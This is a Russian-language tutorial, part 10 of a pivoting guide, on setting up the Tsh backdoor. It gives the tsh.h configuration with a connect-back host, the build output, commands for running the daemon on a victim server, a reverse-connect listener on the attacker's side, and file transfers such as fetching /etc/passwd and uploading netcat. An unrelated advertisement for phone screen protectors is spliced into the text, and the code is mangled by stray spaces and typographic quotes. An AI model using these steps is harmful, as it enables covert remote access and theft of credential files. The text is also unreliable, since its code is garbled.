Руководство по pivoting. Часть 10

Tsh
Tsh является небольшим бэкдор, подобным SSH, с pty-полным терминалом и с возможностью передачи файлов. Этот инструмент имеет очень небольшие размеры и легко встраивается в большинстве Unix-подобных систем. Кстати, на сайте https://android-dv.ru/catalog/zashchitnye_plenki_stekla/ вы сможете купить защитные пленки для смартфонов по самым низким ценам.

Начните с изменения файла tsh.h:
#ifndef _TSH_H
#define _TSH_H

char * secret = «never say never say die»;

#define SERVER_PORT 22
short int server_port = SERVER_PORT;
/ *
#define CONNECT_BACK_HOST «localhost»
#define CONNECT_BACK_DELAY 30
* /
#define GET_FILE 1
#define PUT_FILE 2
#define RUNSHELL 3

#endif / * tsh.h * /

Измените secret, укажите SERVER_PORT. Раскомментируйте и отредактируйте директивы CONNECT_BACK_HOST и CONNECT_BACK_DELAY, если хотите получить backconnect. Запустите make:
$ Make linux_x64
make \
    LDFLAGS = "-Xlinker —no-as-needed -lutil" \
    DEFS = "-DLINUX" \
    tsh tshd
make [1]: Entering directory ‘/ tmp / tsh "
gcc -O3 -W -Wall -DLINUX -c pel.c
gcc -O3 -W -Wall -DLINUX -c aes.c
gcc -O3 -W -Wall -DLINUX -c sha1.c
gcc -O3 -W -Wall -DLINUX -c tsh.c
gcc -Xlinker —no-as-needed -lutil -o tsh pel.o aes.o sha1.o tsh.o
strip tsh
gcc -O3 -W -Wall -DLINUX -c tshd.c
gcc -Xlinker —no-as-needed -lutil -o tshd pel.o aes.o sha1.o tshd.o
strip tshd
make [1]: Leaving directory ‘/ tmp / tsh "
Теперь запустите ./tshd на сервере. Он начнет слушать на указанном порту. Вы можете подключиться к нему с помощью выполнения следующей команды:
./tsh host_ip
Если tsh был скомпилирован с возможностью backconnect, то демон tshd попытается подключиться обратно к машине атакующего. Для запуска слушателя на стороне злоумышленника:
$ ./tsh cb
Waiting for the server to connect…
Для передачи файлов с tsh:
./tsh host_ip get / etc / passwd.
./tsh host_ip put / bin / netcat / tmp

Читайте также: